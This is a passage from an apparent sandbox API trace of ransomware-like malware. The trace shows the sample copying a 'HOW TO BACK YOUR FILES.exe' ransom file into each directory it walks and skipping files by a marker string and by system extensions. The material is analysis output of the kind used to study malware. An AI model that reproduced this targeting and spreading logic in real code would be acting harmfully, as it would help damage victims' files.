files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Stationery\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\microsoft\\windows mail\\stationery\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.383] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.383] GetLastError () returned 0x0 [0042.383] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.383] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.383] CloseHandle (hObject=0x118) returned 1 [0042.383] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0042.383] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.383] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Stationery\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a874760, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a874760, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.383] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.384] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.384] lstrcpyW (in: lpString1=0x2e2e910, lpString2="Bears.htm" | out: lpString1="Bears.htm") returned="Bears.htm" [0042.384] lstrlenW (lpString="Bears.htm") returned 9 [0042.384] lstrlenW (lpString="Ares865") returned 7 [0042.384] lstrcmpiW (lpString1="ars.htm", lpString2="Ares865") returned 1 [0042.384] lstrlenW (lpString=".dll") returned 4 [0042.384] lstrcmpiW (lpString1="Bears.htm", lpString2=".dll") returned 1 [0042.384] lstrlenW (lpString=".lnk") returned 4 [0042.384] lstrcmpiW (lpString1="Bears.htm", lpString2=".lnk") returned 1 [0042.384] lstrlenW (lpString=".ini") returned 4 [0042.384] lstrcmpiW (lpString1="Bears.htm", lpString2=".ini") returned 1 [0042.384] lstrlenW (lpString=".sys") returned 4 [0042.384] lstrcmpiW (lpString1="Bears.htm", lpString2=".sys") returned 1 [0042.384] lstrlenW (lpString="Bears.htm") returned 9 [0042.384] lstrcpyW (in: lpString1=0x2e2e910, lpString2="Bears.jpg" | out: lpString1="Bears.jpg") returned="Bears.jpg" [0042.384] lstrlenW (lpString="Bears.jpg") returned 9 [0042.384] lstrlenW (lpString="Ares865") returned 7 [0042.384] lstrcmpiW (lpString1="ars.jpg", lpString2="Ares865") returned 1 [0042.384] lstrlenW (lpString=".dll") returned 4 [0042.384] lstrcmpiW (lpString1="Bears.jpg", lpString2=".dll") returned 1 [0042.384] lstrlenW (lpString=".lnk") returned 4 [0042.384] lstrcmpiW (lpString1="Bears.jpg", lpString2=".lnk") returned 1 [0042.384] lstrlenW (lpString=".ini") returned 4 [0042.384] lstrcmpiW (lpString1="Bears.jpg", lpString2=".ini") returned 1 [0042.384] lstrlenW (lpString=".sys") returned 4 [0042.384] lstrcmpiW (lpString1="Bears.jpg", lpString2=".sys") returned 1 [0042.384] lstrlenW (lpString="Bears.jpg") returned 9 [0042.384] lstrcpyW (in: lpString1=0x2e2e910, lpString2="Desktop.ini" | out: lpString1="Desktop.ini") returned="Desktop.ini" [0042.384] lstrlenW (lpString="Desktop.ini") returned 11 [0042.384] lstrlenW (lpString="Ares865") returned 7 [0042.384] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0042.385] lstrlenW (lpString=".dll") returned 4 [0042.385] lstrcmpiW (lpString1="Desktop.ini", lpString2=".dll") returned 1 [0042.385] lstrlenW (lpString=".lnk") returned 4 [0042.385] lstrcmpiW (lpString1="Desktop.ini", lpString2=".lnk") returned 1 [0042.385] lstrlenW (lpString=".ini") returned 4 [0042.385] lstrcmpiW (lpString1="Desktop.ini", lpString2=".ini") returned 1 [0042.385] lstrlenW (lpString=".sys") returned 4 [0042.385] lstrcmpiW (lpString1="Desktop.ini", lpString2=".sys") returned 1 [0042.385] lstrlenW (lpString="Desktop.ini") returned 11 [0042.385] lstrcpyW (in: lpString1=0x2e2e910, lpString2="Garden.htm" | out: lpString1="Garden.htm") returned="Garden.htm" [0042.385] lstrlenW (lpString="Garden.htm") returned 10 [0042.385] lstrlenW (lpString="Ares865") returned 7 [0042.385] lstrcmpiW (lpString1="den.htm", lpString2="Ares865") returned 1 [0042.385] lstrlenW (lpString=".dll") returned 4 [0042.385] lstrcmpiW (lpString1="Garden.htm", lpString2=".dll") returned 1 [0042.385] lstrlenW (lpString=".lnk") returned 4 [0042.385] lstrcmpiW (lpString1="Garden.htm", lpString2=".lnk") returned 1 [0042.385] lstrlenW (lpString=".ini") returned 4 [0042.385] lstrcmpiW (lpString1="Garden.htm", lpString2=".ini") returned 1 [0042.385] lstrlenW (lpString=".sys") returned 4 [0042.385] lstrcmpiW (lpString1="Garden.htm", lpString2=".sys") returned 1 [0042.385] lstrlenW (lpString="Garden.htm") returned 10 [0042.385] lstrcpyW (in: lpString1=0x2e2e910, lpString2="Garden.jpg" | out: lpString1="Garden.jpg") returned="Garden.jpg" [0042.385] lstrlenW (lpString="Garden.jpg") returned 10 [0042.385] lstrlenW (lpString="Ares865") returned 7 [0042.385] lstrcmpiW (lpString1="den.jpg", lpString2="Ares865") returned 1 [0042.385] lstrlenW (lpString=".dll") returned 4 [0042.385] lstrcmpiW (lpString1="Garden.jpg", lpString2=".dll") returned 1 [0042.385] lstrlenW (lpString=".lnk") returned 4 [0042.385] lstrcmpiW (lpString1="Garden.jpg", lpString2=".lnk") returned 1 [0042.385] lstrlenW (lpString=".ini") returned 4 [0042.385] lstrcmpiW (lpString1="Garden.jpg", lpString2=".ini") returned 1 [0042.385] lstrlenW (lpString=".sys") returned 4 [0042.386] lstrcmpiW (lpString1="Garden.jpg", lpString2=".sys") returned 1 [0042.386] lstrlenW (lpString="Garden.jpg") returned 10 [0042.386] lstrcpyW (in: lpString1=0x2e2e910, lpString2="Green Bubbles.htm" | out: lpString1="Green Bubbles.htm") returned="Green Bubbles.htm" [0042.386] lstrlenW (lpString="Green Bubbles.htm") returned 17 [0042.386] lstrlenW (lpString="Ares865") returned 7 [0042.386] lstrcmpiW (lpString1="les.htm", lpString2="Ares865") returned 1 [0042.386] lstrlenW (lpString=".dll") returned 4 [0042.386] lstrcmpiW (lpString1="Green Bubbles.htm", lpString2=".dll") returned 1 [0042.386] lstrlenW (lpString=".lnk") returned 4 [0042.386] lstrcmpiW (lpString1="Green Bubbles.htm", lpString2=".lnk") returned 1 [0042.386] lstrlenW (lpString=".ini") returned 4 [0042.386] lstrcmpiW (lpString1="Green Bubbles.htm", lpString2=".ini") returned 1 [0042.386] lstrlenW (lpString=".sys") returned 4 [0042.386] lstrcmpiW (lpString1="Green Bubbles.htm", lpString2=".sys") returned 1 [0042.386] lstrlenW (lpString="Green Bubbles.htm") returned 17 [0042.386] lstrcpyW (in: lpString1=0x2e2e910, lpString2="GreenBubbles.jpg" | out: lpString1="GreenBubbles.jpg") returned="GreenBubbles.jpg" [0042.386] lstrlenW (lpString="GreenBubbles.jpg") returned 16 [0042.386] lstrlenW (lpString="Ares865") returned 7 [0042.386] lstrcmpiW (lpString1="les.jpg", lpString2="Ares865") returned 1 [0042.386] lstrlenW (lpString=".dll") returned 4 [0042.386] lstrcmpiW (lpString1="GreenBubbles.jpg", lpString2=".dll") returned 1 [0042.386] lstrlenW (lpString=".lnk") returned 4 [0042.386] lstrcmpiW (lpString1="GreenBubbles.jpg", lpString2=".lnk") returned 1 [0042.386] lstrlenW (lpString=".ini") returned 4 [0042.386] lstrcmpiW (lpString1="GreenBubbles.jpg", lpString2=".ini") returned 1 [0042.386] lstrlenW (lpString=".sys") returned 4 [0042.386] lstrcmpiW (lpString1="GreenBubbles.jpg", lpString2=".sys") returned 1 [0042.386] lstrlenW (lpString="GreenBubbles.jpg") returned 16 [0042.386] lstrcpyW (in: lpString1=0x2e2e910, lpString2="Hand Prints.htm" | out: lpString1="Hand Prints.htm") returned="Hand Prints.htm" [0042.386] lstrlenW (lpString="Hand Prints.htm") returned 15 [0042.387] lstrlenW (lpString="Ares865") returned 7 [0042.387] lstrcmpiW (lpString1="nts.htm", lpString2="Ares865") returned 1 [0042.387] lstrlenW (lpString=".dll") returned 4 [0042.387] lstrcmpiW (lpString1="Hand Prints.htm", lpString2=".dll") returned 1 [0042.387] lstrlenW (lpString=".lnk") returned 4 [0042.387] lstrcmpiW (lpString1="Hand Prints.htm", lpString2=".lnk") returned 1 [0042.387] lstrlenW (lpString=".ini") returned 4 [0042.387] lstrcmpiW (lpString1="Hand Prints.htm", lpString2=".ini") returned 1 [0042.387] lstrlenW (lpString=".sys") returned 4 [0042.387] lstrcmpiW (lpString1="Hand Prints.htm", lpString2=".sys") returned 1 [0042.387] lstrlenW (lpString="Hand Prints.htm") returned 15 [0042.387] lstrcpyW (in: lpString1=0x2e2e910, lpString2="HandPrints.jpg" | out: lpString1="HandPrints.jpg") returned="HandPrints.jpg" [0042.387] lstrlenW (lpString="HandPrints.jpg") returned 14 [0042.387] lstrlenW (lpString="Ares865") returned 7 [0042.387] lstrcmpiW (lpString1="nts.jpg", lpString2="Ares865") returned 1 [0042.387] lstrlenW (lpString=".dll") returned 4 [0042.387] lstrcmpiW (lpString1="HandPrints.jpg", lpString2=".dll") returned 1 [0042.387] lstrlenW (lpString=".lnk") returned 4 [0042.387] lstrcmpiW (lpString1="HandPrints.jpg", lpString2=".lnk") returned 1 [0042.387] lstrlenW (lpString=".ini") returned 4 [0042.387] lstrcmpiW (lpString1="HandPrints.jpg", lpString2=".ini") returned 1 [0042.387] lstrlenW (lpString=".sys") returned 4 [0042.387] lstrcmpiW (lpString1="HandPrints.jpg", lpString2=".sys") returned 1 [0042.387] lstrlenW (lpString="HandPrints.jpg") returned 14 [0042.387] lstrcpyW (in: lpString1=0x2e2e910, lpString2="Orange Circles.htm" | out: lpString1="Orange Circles.htm") returned="Orange Circles.htm" [0042.387] lstrlenW (lpString="Orange Circles.htm") returned 18 [0042.387] lstrlenW (lpString="Ares865") returned 7 [0042.387] lstrcmpiW (lpString1="les.htm", lpString2="Ares865") returned 1 [0042.387] lstrlenW (lpString=".dll") returned 4 [0042.387] lstrcmpiW (lpString1="Orange Circles.htm", lpString2=".dll") returned 1 [0042.387] lstrlenW (lpString=".lnk") returned 4 [0042.388] lstrcmpiW (lpString1="Orange Circles.htm", lpString2=".lnk") returned 1 [0042.388] lstrlenW (lpString=".ini") returned 4 [0042.388] lstrcmpiW (lpString1="Orange Circles.htm", lpString2=".ini") returned 1 [0042.388] lstrlenW (lpString=".sys") returned 4 [0042.388] lstrcmpiW (lpString1="Orange Circles.htm", lpString2=".sys") returned 1 [0042.388] lstrlenW (lpString="Orange Circles.htm") returned 18 [0042.388] lstrcpyW (in: lpString1=0x2e2e910, lpString2="OrangeCircles.jpg" | out: lpString1="OrangeCircles.jpg") returned="OrangeCircles.jpg" [0042.388] lstrlenW (lpString="OrangeCircles.jpg") returned 17 [0042.388] lstrlenW (lpString="Ares865") returned 7 [0042.388] lstrcmpiW (lpString1="les.jpg", lpString2="Ares865") returned 1 [0042.388] lstrlenW (lpString=".dll") returned 4 [0042.388] lstrcmpiW (lpString1="OrangeCircles.jpg", lpString2=".dll") returned 1 [0042.388] lstrlenW (lpString=".lnk") returned 4 [0042.388] lstrcmpiW (lpString1="OrangeCircles.jpg", lpString2=".lnk") returned 1 [0042.388] lstrlenW (lpString=".ini") returned 4 [0042.388] lstrcmpiW (lpString1="OrangeCircles.jpg", lpString2=".ini") returned 1 [0042.388] lstrlenW (lpString=".sys") returned 4 [0042.388] lstrcmpiW (lpString1="OrangeCircles.jpg", lpString2=".sys") returned 1 [0042.388] lstrlenW (lpString="OrangeCircles.jpg") returned 17 [0042.388] lstrcpyW (in: lpString1=0x2e2e910, lpString2="Peacock.htm" | out: lpString1="Peacock.htm") returned="Peacock.htm" [0042.388] lstrlenW (lpString="Peacock.htm") returned 11 [0042.388] lstrlenW (lpString="Ares865") returned 7 [0042.388] lstrcmpiW (lpString1="ock.htm", lpString2="Ares865") returned 1 [0042.388] lstrlenW (lpString=".dll") returned 4 [0042.388] lstrcmpiW (lpString1="Peacock.htm", lpString2=".dll") returned 1 [0042.388] lstrcpyW (in: lpString1=0x2e2e910, lpString2="Peacock.jpg" | out: lpString1="Peacock.jpg") returned="Peacock.jpg" [0042.388] lstrlenW (lpString="Peacock.jpg") returned 11 [0042.388] lstrlenW (lpString="Ares865") returned 7 [0042.388] lstrcmpiW (lpString1="ock.jpg", lpString2="Ares865") returned 1 [0042.389] lstrcpyW (in: lpString1=0x2e2e910, lpString2="Roses.htm" | out: lpString1="Roses.htm") returned="Roses.htm" [0042.389] lstrlenW (lpString="Roses.htm") returned 9 [0042.389] lstrlenW (lpString="Ares865") returned 7 [0042.389] lstrcmpiW (lpString1="ses.htm", lpString2="Ares865") returned 1 [0042.389] lstrcpyW (in: lpString1=0x2e2e910, lpString2="Roses.jpg" | out: lpString1="Roses.jpg") returned="Roses.jpg" [0042.389] lstrlenW (lpString="Roses.jpg") returned 9 [0042.389] lstrlenW (lpString="Ares865") returned 7 [0042.389] lstrcmpiW (lpString1="ses.jpg", lpString2="Ares865") returned 1 [0042.389] lstrcpyW (in: lpString1=0x2e2e910, lpString2="Shades of Blue.htm" | out: lpString1="Shades of Blue.htm") returned="Shades of Blue.htm" [0042.389] lstrlenW (lpString="Shades of Blue.htm") returned 18 [0042.389] lstrlenW (lpString="Ares865") returned 7 [0042.389] lstrcmpiW (lpString1="lue.htm", lpString2="Ares865") returned 1 [0042.389] lstrcpyW (in: lpString1=0x2e2e910, lpString2="ShadesOfBlue.jpg" | out: lpString1="ShadesOfBlue.jpg") returned="ShadesOfBlue.jpg" [0042.389] lstrlenW (lpString="ShadesOfBlue.jpg") returned 16 [0042.389] lstrlenW (lpString="Ares865") returned 7 [0042.389] lstrcmpiW (lpString1="lue.jpg", lpString2="Ares865") returned 1 [0042.389] lstrcpyW (in: lpString1=0x2e2e910, lpString2="Soft Blue.htm" | out: lpString1="Soft Blue.htm") returned="Soft Blue.htm" [0042.389] lstrlenW (lpString="Soft Blue.htm") returned 13 [0042.389] lstrlenW (lpString="Ares865") returned 7 [0042.389] lstrcmpiW (lpString1="lue.htm", lpString2="Ares865") returned 1 [0042.389] lstrcpyW (in: lpString1=0x2e2e910, lpString2="SoftBlue.jpg" | out: lpString1="SoftBlue.jpg") returned="SoftBlue.jpg" [0042.389] lstrlenW (lpString="SoftBlue.jpg") returned 12 [0042.389] lstrlenW (lpString="Ares865") returned 7 [0042.389] lstrcmpiW (lpString1="lue.jpg", lpString2="Ares865") returned 1 [0042.389] lstrcpyW (in: lpString1=0x2e2e910, lpString2="Stars.htm" | out: lpString1="Stars.htm") returned="Stars.htm" [0042.389] lstrlenW (lpString="Stars.htm") returned 9 [0042.389] lstrlenW (lpString="Ares865") returned 7 [0042.390] lstrcmpiW (lpString1="ars.htm", lpString2="Ares865") returned 1 [0042.390] lstrcpyW (in: lpString1=0x2e2e910, lpString2="Stars.jpg" | out: lpString1="Stars.jpg") returned="Stars.jpg" [0042.390] lstrlenW (lpString="Stars.jpg") returned 9 [0042.390] lstrlenW (lpString="Ares865") returned 7 [0042.390] lstrcmpiW (lpString1="ars.jpg", lpString2="Ares865") returned 1 [0042.390] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Backup", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Backup") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Backup" [0042.390] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cbdb0 | out: hHeap=0x2b0000) returned 1 [0042.390] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2420 | out: hHeap=0x2b0000) returned 1 [0042.390] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Backup") returned 83 [0042.390] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Backup" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Backup") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Backup" [0042.390] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.390] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Backup\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\microsoft\\windows mail\\backup\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.390] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.390] GetLastError () returned 0x0 [0042.391] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.391] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.391] CloseHandle (hObject=0x118) returned 1 [0042.391] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0042.391] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.391] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Backup\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a89a8c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a89a8c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.391] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.391] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.391] lstrcpyW (in: lpString1=0x2e2e908, lpString2="new" | out: lpString1="new") returned="new" [0042.391] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2420 [0042.391] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xb0) returned 0x2cbdb0 [0042.391] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2428 | out: ListHead=0x2e77d0, ListEntry=0x2d2428) returned 0x2d2408 [0042.391] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a8e6b80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a8e6b80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="new", cAlternateFileName="")) returned 0 [0042.391] FindClose (in: hFindFile=0x2ccea8 | out: hFindFile=0x2ccea8) returned 1 [0042.391] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d2428 [0042.391] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Backup\\new", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Backup\\new") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Backup\\new" [0042.391] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cbdb0 | out: hHeap=0x2b0000) returned 1 [0042.391] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2420 | out: hHeap=0x2b0000) returned 1 [0042.391] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Backup\\new") returned 87 [0042.391] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Backup\\new" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Backup\\new") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Backup\\new" [0042.391] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.392] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Backup\\new\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\microsoft\\windows mail\\backup\\new\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.392] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.392] GetLastError () returned 0x0 [0042.392] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.392] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.392] CloseHandle (hObject=0x118) returned 1 [0042.392] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0042.392] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.392] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Backup\\new\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a8e6b80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a8e6b80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.393] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.393] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.393] lstrcpyW (in: lpString1=0x2e2e910, lpString2="edb00001.log" | out: lpString1="edb00001.log") returned="edb00001.log" [0042.393] lstrlenW (lpString="edb00001.log") returned 12 [0042.393] lstrlenW (lpString="Ares865") returned 7 [0042.393] lstrcmpiW (lpString1="001.log", lpString2="Ares865") returned -1 [0042.393] lstrcpyW (in: lpString1=0x2e2e910, lpString2="WindowsMail.MSMessageStore" | out: lpString1="WindowsMail.MSMessageStore") returned="WindowsMail.MSMessageStore" [0042.393] lstrlenW (lpString="WindowsMail.MSMessageStore") returned 26 [0042.393] lstrlenW (lpString="Ares865") returned 7 [0042.393] lstrcmpiW (lpString1="geStore", lpString2="Ares865") returned 1 [0042.393] lstrcpyW (in: lpString1=0x2e2e910, lpString2="WindowsMail.pat" | out: lpString1="WindowsMail.pat") returned="WindowsMail.pat" [0042.393] lstrlenW (lpString="WindowsMail.pat") returned 15 [0042.393] lstrlenW (lpString="Ares865") returned 7 [0042.393] lstrcmpiW (lpString1="ail.pat", lpString2="Ares865") returned -1 [0042.393] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player" [0042.393] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cbb78 | out: hHeap=0x2b0000) returned 1 [0042.393] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2400 | out: hHeap=0x2b0000) returned 1 [0042.393] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player") returned 76 [0042.393] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player" [0042.393] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.393] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\microsoft\\media player\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.394] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.394] GetLastError () returned 0x0 [0042.394] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.394] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.394] CloseHandle (hObject=0x118) returned 1 [0042.394] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0042.394] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.394] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aa17680, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aa17680, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 